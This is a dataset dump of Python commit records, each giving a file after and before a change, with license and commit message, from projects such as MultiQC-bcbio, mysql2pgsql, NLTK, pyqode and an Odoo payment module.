config.fn_clean_exts.append({'type': 'regex', 'pattern': '_bcbio.*'})
config.update_dict(config.table_columns_visible, {
'FastQC': {
'percent_duplicates': False,
'total_sequences': False,
},
'QualiMap': {
'percentage_aligned': False,
'median_coverage': False,
},
'Samtools Stats': {
'non-primary_alignments': False,
'reads_mapped': False,
'reads_mapped_percent': False,
'raw_total_sequences': False,
'error_rate': False,
},
'SnpEff': {
'Change_rate': False,
'Ts_Tv_ratio': False,
'Number_of_variants_before_filter': False,
},
})
config.module_order = [
"bcbio",
"samtools",
"goleft_indexcov",
"bcftools",
"picard",
"qualimap",
"snpeff",
"fastqc",
"preseq"
]
| from __future__ import absolute_import
from .bcbio import MultiqcModule
from multiqc import config
# Add search patterns and config options for the things that are used in MultiQC_bcbio
def multiqc_bcbio_config():
""" Set up MultiQC config defaults for this package """
bcbio_search_patterns = {
'bcbio/metrics': {'fn': '*_bcbio.txt'},
'bcbio/coverage': {'fn': '*_bcbio_coverage.txt'},
'bcbio/coverage_avg': {'fn': '*_bcbio_coverage_avg.txt'},
'bcbio/variants': {'fn': '*_bcbio_variants.txt'},
'bcbio/target': {'fn': 'target_info.yaml'},
'bcbio/qsignature': {'fn': '*bcbio_qsignature.ma'},
'bcbio/vcfstats': {'fn': '*_bcbio_variants_stats.txt'},
'bcbio/seqbuster': {'contents': 'seqbuster'},
'bcbio/umi': {'fn': '*_umi_stats.yaml'},
'bcbio/viral': {'fn': '*viral*-counts.txt'},
'bcbio/damage': {'fn': '*damage.yaml'},
}
config.update_dict(config.sp, bcbio_search_patterns)
config.fn_clean_exts.append({'type': 'regex', 'pattern': '_bcbio.*'})
config.update_dict(config.table_columns_visible, {
'FastQC': {
'percent_duplicates': False,
'total_sequences': False,
},
'QualiMap': {
'percentage_aligned': False,
},
'Samtools Stats': {
'non-primary_alignments': False,
'reads_mapped': False,
'reads_mapped_percent': False,
'raw_total_sequences': False,
'error_rate': False,
},
'SnpEff': {
'Change_rate': False,
'Ts_Tv_ratio': False,
'Number_of_variants_before_filter': False,
},
})
config.module_order = [
"bcbio",
"samtools",
"goleft_indexcov",
"bcftools",
"picard",
"qualimap",
"snpeff",
"fastqc",
"preseq"
]
| mit | Python |
cf20e89c12cf88ab57f9cdc758acbbde70282a93 | Set index_prefix to '' in CONFIG_TEMPLATE. | philipsoutham/py-mysql2pgsql | mysql2pgsql/lib/config.py | mysql2pgsql/lib/config.py | from __future__ import with_statement, absolute_import
import os.path
from yaml import load
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from .errors import ConfigurationFileInitialized,\
ConfigurationFileNotFound
class ConfigBase(object):
def __init__(self, config_file_path):
self.options = load(open(config_file_path))
class Config(ConfigBase):
def __init__(self, config_file_path, generate_if_not_found=True):
if not os.path.isfile(config_file_path):
if generate_if_not_found:
self.reset_configfile(config_file_path)
if os.path.isfile(config_file_path):
raise ConfigurationFileInitialized("""No configuration file found.
A new file has been initialized at: %s
Please review the configuration and retry...""" % config_file_path)
else:
raise ConfigurationFileNotFound("cannot load config file %s" % config_file_path)
super(Config, self).__init__(config_file_path)
def reset_configfile(self, file_path):
with open(file_path, 'w') as f:
f.write(CONFIG_TEMPLATE)
CONFIG_TEMPLATE = """
# a socket connection will be selected if a 'socket' is specified
# also 'localhost' is a special 'hostname' for MySQL that overrides the 'port' option
# and forces it to use a local socket connection
# if tcp is chosen, you can use compression
mysql:
hostname: localhost
port: 3306
socket: /tmp/mysql.sock
username: mysql2psql
password:
database: mysql2psql_test
compress: false
destination:
# if file is given, output goes to file, else postgres
file:
postgres:
hostname: localhost
port: 5432
username: mysql2psql
password:
database: mysql2psql_test
# if tables is given, only the listed tables will be converted. leave empty to convert all tables.
#only_tables:
#- table1
#- table2
# if exclude_tables is given, exclude the listed tables from the conversion.
#exclude_tables:
#- table3
#- table4
# if supress_data is true, only the schema definition will be exported/migrated, and not the data
supress_data: false
# if supress_ddl is true, only the data will be exported/imported, and not the schema
supress_ddl: false
# if force_truncate is true, forces a table truncate before table loading
force_truncate: false
# if timezone is true, forces to append/convert to UTC tzinfo mysql data
timezone: false
# if index_prefix is given, indexes will be created whith a name prefixed with index_prefix
index_prefix: ''
"""
| from __future__ import with_statement, absolute_import
import os.path
from yaml import load
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from .errors import ConfigurationFileInitialized,\
ConfigurationFileNotFound
class ConfigBase(object):
def __init__(self, config_file_path):
self.options = load(open(config_file_path))
class Config(ConfigBase):
def __init__(self, config_file_path, generate_if_not_found=True):
if not os.path.isfile(config_file_path):
if generate_if_not_found:
self.reset_configfile(config_file_path)
if os.path.isfile(config_file_path):
raise ConfigurationFileInitialized("""No configuration file found.
A new file has been initialized at: %s
Please review the configuration and retry...""" % config_file_path)
else:
raise ConfigurationFileNotFound("cannot load config file %s" % config_file_path)
super(Config, self).__init__(config_file_path)
def reset_configfile(self, file_path):
with open(file_path, 'w') as f:
f.write(CONFIG_TEMPLATE)
CONFIG_TEMPLATE = """
# a socket connection will be selected if a 'socket' is specified
# also 'localhost' is a special 'hostname' for MySQL that overrides the 'port' option
# and forces it to use a local socket connection
# if tcp is chosen, you can use compression
mysql:
hostname: localhost
port: 3306
socket: /tmp/mysql.sock
username: mysql2psql
password:
database: mysql2psql_test
compress: false
destination:
# if file is given, output goes to file, else postgres
file:
postgres:
hostname: localhost
port: 5432
username: mysql2psql
password:
database: mysql2psql_test
# if tables is given, only the listed tables will be converted. leave empty to convert all tables.
#only_tables:
#- table1
#- table2
# if exclude_tables is given, exclude the listed tables from the conversion.
#exclude_tables:
#- table3
#- table4
# if supress_data is true, only the schema definition will be exported/migrated, and not the data
supress_data: false
# if supress_ddl is true, only the data will be exported/imported, and not the schema
supress_ddl: false
# if force_truncate is true, forces a table truncate before table loading
force_truncate: false
# if timezone is true, forces to append/convert to UTC tzinfo mysql data
timezone: false
# if index_prefix is given, indexes will be created whith a name prefixed with index_prefix
index_prefix:
"""
| mit | Python |
9a698d1428fbe0744c9dba3532b778569dbe1dd4 | Add docstrings and author reference | facundovictor/non-blocking-socket-samples | server.py | server.py | """
A Simple Server class that allows to configure a socket in a very simple way.
It is for studying purposes only.
"""
import socket
import sys
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
class SimpleServer(object):
"""Simple server using the socket library"""
def __init__(self, blocking=False, connection_oriented=True):
"""
The constructor initializes socket specifying the blocking status and
if it must be a connection oriented socket.
:param blocking: A flag that specifies if the socket must be blocking
:ptype: Boolean
:param connection_oriented: A flag that specifies if the socket must
be connection oriented or not
:ptype: Boolean
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not blocking:
self.sock.setblocking(0)
def connect(self, host, port):
"""
Connects the server to the "host", and prepares it to listen on "port"
:param host: The network layer identifier of an interface
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server_address = (host, port)
self.sock.connect(server_address)
print('starting up on %s port %s' % server_address)
| import socket
import sys
class SimpleServer(object):
"""Simple server using the socket library"""
def __init__(self, blocking=False, connection_oriented=True):
"""
The constructor initializes socket specifying the blocking status and
if it must be a connection oriented socket.
:param blocking: A flag that specifies if the socket must be blocking
:ptype: Boolean
:param connection_oriented: A flag that specifies if the socket must
be connection oriented or not
:ptype: Boolean
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not blocking:
self.sock.setblocking(0)
def connect(self, host, port):
"""
Connects the server to the "host", and prepares it to listen on "port"
:param host: The network layer identifier of an interface
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
self.sock.connect((host, port))
| mit | Python |
195adc56728d2c0e958d81142fb3f4b90cef35ea | Make server.py work in both python 2 and 3 | colevk/dark-souls-map-viewer,colevk/dark-souls-map-viewer | server.py | server.py | #!/usr/bin/env python
from __future__ import print_function
import os
try:
# python 2
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import SimpleHTTPServer
test = SimpleHTTPServer.test
except ImportError:
# python 3
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import http.server
test = http.server.test
class GzipHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_head(self):
"""Common code for GET and HEAD commands.
We want to save space with the .iv files, so send them gzipped.
This overrides the default headers only for .iv files.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
# This part here is the only difference from the base class
if self.path.endswith(".iv"):
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Encoding", "gzip")
else:
self.send_header("Content-type", ctype)
# No more differences after this
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
print("\nGo to http://localhost:8000 to view.")
print("Type Ctrl-C to quit.\n")
try:
test(GzipHTTPRequestHandler, HTTPServer)
except KeyboardInterrupt:
print("\nExiting.")
| #!/usr/bin/env python
import os
import SimpleHTTPServer
import BaseHTTPServer
class GzipHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def send_head(self):
"""Common code for GET and HEAD commands.
We want to save space with the .iv files, so send them gzipped.
This overrides the default headers only for .iv files.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
# This part here is the only difference from the base class
if self.path.endswith(".iv"):
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Encoding", "gzip")
else:
self.send_header("Content-type", ctype)
# No more differences after this
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
print "\nGo to http://localhost:8000 to view."
print "Type Ctrl-C to quit.\n"
try:
SimpleHTTPServer.test(GzipHTTPRequestHandler, BaseHTTPServer.HTTPServer)
except KeyboardInterrupt:
print "\nExiting."
| mit | Python |
ce2b797cb61301f3e8b7f21389baa112db7c1f90 | Allow user to specify active and comment | redhat-cip/python-dciclient,redhat-cip/python-dciclient | dciclient/v1/api/jobdefinition.py | dciclient/v1/api/jobdefinition.py | # -*- encoding: utf-8 -*-
#
# Copyright 2015-2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from dciclient.v1.api import base
RESOURCE = 'jobdefinitions'
TABLE_HEADERS = ['id', 'name', 'priority', 'topic_id', 'active', 'comment',
'etag', 'created_at', 'updated_at']
def create(context, name, topic_id, priority=None, active=None, comment=None,
component_types=None):
if component_types is None:
component_types = []
return base.create(context, RESOURCE, name=name, priority=priority,
active=active, comment=comment, topic_id=topic_id,
component_types=component_types)
def list(context, topic_id, embed=None):
return base.list(context, RESOURCE, topic_id=topic_id, embed=embed)
def get(context, id, where=None, embed=None):
return base.get(context, RESOURCE, id=id, where=where, embed=embed)
def delete(context, id, etag):
return base.delete(context, RESOURCE, id=id, etag=etag)
def annotate(context, id, comment, etag):
return base.update(context, RESOURCE, id=id, etag=etag, comment=comment)
def setactive(context, id, active, etag):
active_bool = active in ['True', 'true']
return base.update(context, RESOURCE, id=id, etag=etag, active=active_bool)
def get_components(context, id):
uri = '%s/%s/%s/components' % (context.dci_cs_api, RESOURCE, id)
return context.session.get(uri)
def add_test(context, id, test_id):
uri = '%s/%s/%s/tests' % (context.dci_cs_api, RESOURCE, id)
return context.session.post(uri, json={'test_id': test_id})
def list_tests(context, id, **kwargs):
return base.list(context, RESOURCE, id=id, subresource='tests', **kwargs)
def remove_test(context, id, test_id):
return base.delete(context, RESOURCE, id,
subresource='tests',
subresource_id=test_id)
| # -*- encoding: utf-8 -*-
#
# Copyright 2015-2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from dciclient.v1.api import base
RESOURCE = 'jobdefinitions'
TABLE_HEADERS = ['id', 'name', 'priority', 'topic_id', 'active', 'comment',
'etag', 'created_at', 'updated_at']
def create(context, name, topic_id, priority=None, component_types=None):
if component_types is None:
component_types = []
return base.create(context, RESOURCE, name=name, priority=priority,
topic_id=topic_id, component_types=component_types)
def list(context, topic_id, embed=None):
return base.list(context, RESOURCE, topic_id=topic_id, embed=embed)
def get(context, id, where=None, embed=None):
return base.get(context, RESOURCE, id=id, where=where, embed=embed)
def delete(context, id, etag):
return base.delete(context, RESOURCE, id=id, etag=etag)
def annotate(context, id, comment, etag):
return base.update(context, RESOURCE, id=id, etag=etag, comment=comment)
def setactive(context, id, active, etag):
active_bool = active in ['True', 'true']
return base.update(context, RESOURCE, id=id, etag=etag, active=active_bool)
def get_components(context, id):
uri = '%s/%s/%s/components' % (context.dci_cs_api, RESOURCE, id)
return context.session.get(uri)
def add_test(context, id, test_id):
uri = '%s/%s/%s/tests' % (context.dci_cs_api, RESOURCE, id)
return context.session.post(uri, json={'test_id': test_id})
def list_tests(context, id, **kwargs):
return base.list(context, RESOURCE, id=id, subresource='tests', **kwargs)
def remove_test(context, id, test_id):
return base.delete(context, RESOURCE, id,
subresource='tests',
subresource_id=test_id)
| apache-2.0 | Python |
21df1908fa019ca6ad37631888b530a4a9f5abe6 | Fix test recent files when using python runtest.py | pyQode/pyqode.core,pyQode/pyqode.core,zwadar/pyqode.core | test/test_widgets/test_recent_files.py | test/test_widgets/test_recent_files.py | import pytest
from pyqode.core.widgets import RecentFilesManager, MenuRecentFiles
import pyqode.core
def test_open_file():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
assert manager.last_file() is None
manager.open_file(__file__)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_remove_file():
manager = RecentFilesManager('pyQode', 'test')
manager.max_recent_files = 10
manager.clear()
manager.open_file(__file__)
test_path = pyqode.core.__file__
manager.open_file(test_path)
assert len(manager.get_recent_files()) == 2
assert manager.last_file() == test_path
manager.remove(test_path)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_max_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.max_recent_files = 1
manager.open_file(__file__)
assert manager.last_file() == __file__
manager.open_file(pyqode.core.__file__)
assert manager.last_file() == pyqode.core.__file__
assert len(manager.get_recent_files()) == 1
def test_menu_recent_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(__file__)
manager.open_file(pyqode.core.__file__)
mnu = MenuRecentFiles(None, recent_files_manager=manager, title='Recents',
icon_provider=None, clear_icon=None)
mnu.show()
def test_normalized_path():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(r'c:\Test/test.cbl')
manager.open_file(r'c:\Test\test.cbl')
assert len(manager.get_value('list', [])) == 1
| import pytest
from pyqode.core.widgets import RecentFilesManager, MenuRecentFiles
import pyqode.core
def test_open_file():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
assert manager.last_file() is None
manager.open_file(__file__)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_remove_file():
manager = RecentFilesManager('pyQode', 'test')
manager.max_recent_files = 10
manager.clear()
manager.open_file(__file__)
test_path = pyqode.core.__file__
manager.open_file(test_path)
assert len(manager.get_recent_files()) == 2
assert manager.last_file() == test_path
manager.remove(test_path)
assert len(manager.get_recent_files()) == 1
assert manager.last_file() == __file__
def test_max_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.max_recent_files = 1
manager.open_file(__file__)
assert manager.last_file() == __file__
manager.open_file(pytest.__file__)
assert manager.last_file() == pytest.__file__
assert len(manager.get_recent_files()) == 1
def test_menu_recent_files():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(__file__)
manager.open_file(pytest.__file__)
mnu = MenuRecentFiles(None, recent_files_manager=manager, title='Recents',
icon_provider=None, clear_icon=None)
mnu.show()
def test_normalized_path():
manager = RecentFilesManager('pyQode', 'test')
manager.clear()
manager.open_file(r'c:\Test/test.cbl')
manager.open_file(r'c:\Test\test.cbl')
assert len(manager.get_value('list', [])) == 1
| mit | Python |
40869b7aa7001f26a76e4849f6bf604bf6056462 | Increase version number | sebest/py2loggly | py2loggly/__init__.py | py2loggly/__init__.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Sebastien Estienne'
__email__ = 'sebastien.estienne@gmail.com'
__version__ = '1.1.1'
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Sebastien Estienne'
__email__ = 'sebastien.estienne@gmail.com'
__version__ = '0.2'
| mit | Python |
197fcfb88a034b0a12c841da3e06d7d8c37e55af | bump dev version after 0.17.1 tag | desihub/desisim,desihub/desisim | py/desisim/_version.py | py/desisim/_version.py | __version__ = '0.17.1.dev753'
| __version__ = '0.17.1'
| bsd-3-clause | Python |
27d3b463896b2bf04e22f49952746a368e4904e0 | FIX remove coma at end of line | acsone/bank-payment,hbrunn/bank-payment,diagramsoftware/bank-payment,CompassionCH/bank-payment,CompassionCH/bank-payment,open-synergy/bank-payment | account_payment_partner/wizard/payment_order_create.py | account_payment_partner/wizard/payment_order_create.py | # -*- coding: utf-8 -*-
##############################################################################
#
# Account Payment Partner module for Odoo
# Copyright (C) 2014-2015 Akretion (http://www.akretion.com)
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class PaymentOrderCreate(models.TransientModel):
_inherit = 'payment.order.create'
payment_mode = fields.Selection([
('same', 'Same'),
('same_or_null', 'Same or empty'),
('any', 'Any'),
], string='Payment Mode on Invoice')
@api.model
def default_get(self, field_list):
res = super(PaymentOrderCreate, self).default_get(field_list)
context = self.env.context
assert context.get('active_model') == 'payment.order',\
'active_model should be payment.order'
assert context.get('active_id'), 'Missing active_id in context !'
pay_order = self.env['payment.order'].browse(context['active_id'])
res['payment_mode'] = pay_order.mode.default_payment_mode
return res
@api.multi
def extend_payment_order_domain(self, payment_order, domain):
res = super(PaymentOrderCreate, self).extend_payment_order_domain(
payment_order, domain)
if self.invoice and self.payment_mode:
if self.payment_mode == 'same':
domain.append(
('invoice.payment_mode_id', '=', payment_order.mode.id))
elif self.payment_mode == 'same_or_null':
domain += [
'|',
('invoice.payment_mode_id', '=', False),
('invoice.payment_mode_id', '=', payment_order.mode.id)]
# if payment_mode == 'any', don't modify domain
return res
| # -*- coding: utf-8 -*-
##############################################################################
#
# Account Payment Partner module for Odoo
# Copyright (C) 2014-2015 Akretion (http://www.akretion.com)
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class PaymentOrderCreate(models.TransientModel):
_inherit = 'payment.order.create'
payment_mode = fields.Selection([
('same', 'Same'),
('same_or_null', 'Same or empty'),
('any', 'Any'),
], string='Payment Mode on Invoice', default='same')
@api.model
def default_get(self, field_list):
res = super(PaymentOrderCreate, self).default_get(field_list)
context = self.env.context
assert context.get('active_model') == 'payment.order',\
'active_model should be payment.order'
assert context.get('active_id'), 'Missing active_id in context !'
pay_order = self.env['payment.order'].browse(context['active_id'])
res['payment_mode'] = pay_order.mode.default_payment_mode,
return res
@api.multi
def extend_payment_order_domain(self, payment_order, domain):
res = super(PaymentOrderCreate, self).extend_payment_order_domain(
payment_order, domain)
if self.invoice and self.payment_mode:
if self.payment_mode == 'same':
domain.append(
('invoice.payment_mode_id', '=', payment_order.mode.id))
elif self.payment_mode == 'same_or_null':
domain += [
'|',
('invoice.payment_mode_id', '=', False),
('invoice.payment_mode_id', '=', payment_order.mode.id)]
# if payment_mode == 'any', don't modify domain
return res
| agpl-3.0 | Python |
c07ee0cc90c32e842b0a3b0eed203f2cb2161188 | Bump version | mesnardo/snake | snake/version.py | snake/version.py | # file: version.py
# author: Olivier Mesnard (mesnardo@gwu.edu)
# description: Set up the version.
import os
_version_major = 0
_version_minor = 1
_version_micro = '2'
_version_extra = 'dev'
# construct full version string
_ver = [_version_major, _version_minor]
if _version_micro:
_ver.append(_version_micro)
if _version_extra:
_ver.append(_version_extra)
__version__ = '.'.join(map(str, _ver))
CLASSIFIERS = ['Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
'Programming Language :: Python']
description = 'snake: post-processing tools for the flying-snake simulations'
# Long description will go up on the pypi page
long_description = """
Snake
=====
Snake is a collection of Python modules used to post-process the numerical
solution of flying-snake simulations using one of the following software:
* [cuIBM](https://github.com/barbagroup/cuIBM):
a GPU-based immersed boundary method code;
* [PetIBM](https://github.com/barbagroup/PetIBM):
a parallel immersed boundary method code;
* [IBAMR](https://github.com/IBAMR/IBAMR):
an adaptive and distributed-memory parallel implementation of the immersed boundary (IB) method;
* IcoFOAM: the incompressible laminar solver of [OpenFOAM](http://www.openfoam.org/).
License
=======
``snake`` is licensed under the terms of the MIT license. See the file
"LICENSE" for information on the history of this software, terms & conditions
for usage, and a DISCLAIMER OF ALL WARRANTIES.
All trademarks referenced herein are property of their respective holders.
Copyright (c) 2016--, Olivier Mesnard, The George Washington University.
"""
NAME = 'snake'
MAINTAINER = 'Olivier Mesnard'
MAINTAINER_EMAIL = 'mesnardo@gwu.edu'
DESCRIPTION = description
LONG_DESCRIPTION = long_description
URL = 'https://github.com/mesnardo/snake'
DOWNLOAD_URL = ''
LICENSE = 'MIT'
AUTHOR = 'Olivier Mesnard'
AUTHOR_EMAIL = 'mesnardo@gwu.edu'
PLATFORMS = 'Unix'
MAJOR = _version_major
MINOR = _version_minor
MICRO = _version_micro
VERSION = __version__
PACKAGES = ['snake',
'snake.cuibm',
'snake.petibm',
'snake.openfoam',
'snake.ibamr',
'snake.openfoam',
'snake.solutions',
'snake.tests']
PACKAGE_DATA = {'snake': [os.path.join('styles', '*')]}
REQUIRES = ['numpy', 'matplotlib', 'scipy']
| # file: version.py
# author: Olivier Mesnard (mesnardo@gwu.edu)
# description: Set up the version.
import os
_version_major = 0
_version_minor = 1
_version_micro = '1'
_version_extra = 'dev'
# construct full version string
_ver = [_version_major, _version_minor]
if _version_micro:
_ver.append(_version_micro)
if _version_extra:
_ver.append(_version_extra)
__version__ = '.'.join(map(str, _ver))
CLASSIFIERS = ['Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: Unix',
'Programming Language :: Python']
description = 'snake: post-processing tools for the flying-snake simulations'
# Long description will go up on the pypi page
long_description = """
Snake
=====
Snake is a collection of Python modules used to post-process the numerical
solution of flying-snake simulations using one of the following software:
* [cuIBM](https://github.com/barbagroup/cuIBM):
a GPU-based immersed boundary method code;
* [PetIBM](https://github.com/barbagroup/PetIBM):
a parallel immersed boundary method code;
* [IBAMR](https://github.com/IBAMR/IBAMR):
an adaptive and distributed-memory parallel implementation of the immersed boundary (IB) method;
* IcoFOAM: the incompressible laminar solver of [OpenFOAM](http://www.openfoam.org/).
License
=======
``snake`` is licensed under the terms of the MIT license. See the file
"LICENSE" for information on the history of this software, terms & conditions
for usage, and a DISCLAIMER OF ALL WARRANTIES.
All trademarks referenced herein are property of their respective holders.
Copyright (c) 2016--, Olivier Mesnard, The George Washington University.
"""
NAME = 'snake'
MAINTAINER = 'Olivier Mesnard'
MAINTAINER_EMAIL = 'mesnardo@gwu.edu'
DESCRIPTION = description
LONG_DESCRIPTION = long_description
URL = 'https://github.com/mesnardo/snake'
DOWNLOAD_URL = ''
LICENSE = 'MIT'
AUTHOR = 'Olivier Mesnard'
AUTHOR_EMAIL = 'mesnardo@gwu.edu'
PLATFORMS = 'Unix'
MAJOR = _version_major
MINOR = _version_minor
MICRO = _version_micro
VERSION = __version__
PACKAGES = ['snake',
'snake.cuibm',
'snake.petibm',
'snake.openfoam',
'snake.ibamr',
'snake.openfoam',
'snake.solutions',
'snake.tests']
PACKAGE_DATA = {'snake': [os.path.join('styles', '*')]}
REQUIRES = ['numpy', 'matplotlib', 'scipy']
| mit | Python |
3a4cfdfbb6f14e5f54b3ac3a57cb13ac1dfd40f9 | Remove 'punkt_word_tokenize' from tokenize.__all__. This function should not be necessary. | nltk/nltk,nltk/nltk,nltk/nltk | nltk/tokenize/__init__.py | nltk/tokenize/__init__.py | # Natural Language Toolkit: Tokenizers
#
# Copyright (C) 2001-2008 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# Steven Bird <sb@csse.unimelb.edu.au> (minor additions)
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Functions for X{tokenizing}, i.e., dividing text strings into
substrings.
"""
from simple import *
from regexp import *
from punkt import *
from sexpr import *
from nltk.internals import deprecated
__all__ = ['WhitespaceTokenizer', 'SpaceTokenizer', 'TabTokenizer',
'LineTokenizer', 'RegexpTokenizer', 'BlanklineTokenizer',
'WordPunctTokenizer', 'WordTokenizer', 'blankline_tokenize',
'wordpunct_tokenize', 'regexp_tokenize', 'word_tokenize',
'SExprTokenizer', 'sexpr_tokenize', 'line_tokenize',
'PunktWordTokenizer', 'PunktSentenceTokenizer',
]
######################################################################
#{ Deprecated since 0.8
######################################################################
@deprecated("Use nltk.blankline_tokenize() or "
"nltk.BlanklineTokenizer instead.")
def blankline(text):
return BlanklineTokenizer().tokenize(text)
@deprecated("Use nltk.wordpunct_tokenize() or "
"nltk.WordPunctTokenizer instead.")
def wordpunct(text):
return WordPunctTokenizer().tokenize(text)
@deprecated("Use str.split() or nltk.WhitespaceTokenizer instead.")
def whitespace(text):
return WhitespaceTokenizer().tokenize(text)
@deprecated("Use nltk.word_tokenize() or "
"nltk.WordTokenizer instead.")
def word(text):
return WordTokenizer().tokenize(text)
@deprecated("Use nltk.line_tokenize() or "
"nltk.LineTokenizer instead.")
def line(text):
return LineTokenizer().tokenize(text)
#}
| # Natural Language Toolkit: Tokenizers
#
# Copyright (C) 2001-2008 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# Steven Bird <sb@csse.unimelb.edu.au> (minor additions)
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Functions for X{tokenizing}, i.e., dividing text strings into
substrings.
"""
from simple import *
from regexp import *
from punkt import *
from sexpr import *
from nltk.internals import deprecated
__all__ = ['WhitespaceTokenizer', 'SpaceTokenizer', 'TabTokenizer',
'LineTokenizer', 'RegexpTokenizer', 'BlanklineTokenizer',
'WordPunctTokenizer', 'WordTokenizer', 'blankline_tokenize',
'wordpunct_tokenize', 'regexp_tokenize', 'word_tokenize',
'SExprTokenizer', 'sexpr_tokenize', 'line_tokenize',
'PunktWordTokenizer', 'punkt_word_tokenize',
'PunktSentenceTokenizer',
]
######################################################################
#{ Deprecated since 0.8
######################################################################
@deprecated("Use nltk.blankline_tokenize() or "
"nltk.BlanklineTokenizer instead.")
def blankline(text):
return BlanklineTokenizer().tokenize(text)
@deprecated("Use nltk.wordpunct_tokenize() or "
"nltk.WordPunctTokenizer instead.")
def wordpunct(text):
return WordPunctTokenizer().tokenize(text)
@deprecated("Use str.split() or nltk.WhitespaceTokenizer instead.")
def whitespace(text):
return WhitespaceTokenizer().tokenize(text)
@deprecated("Use nltk.word_tokenize() or "
"nltk.WordTokenizer instead.")
def word(text):
return WordTokenizer().tokenize(text)
@deprecated("Use nltk.line_tokenize() or "
"nltk.LineTokenizer instead.")
def line(text):
return LineTokenizer().tokenize(text)
#}
| apache-2.0 | Python |
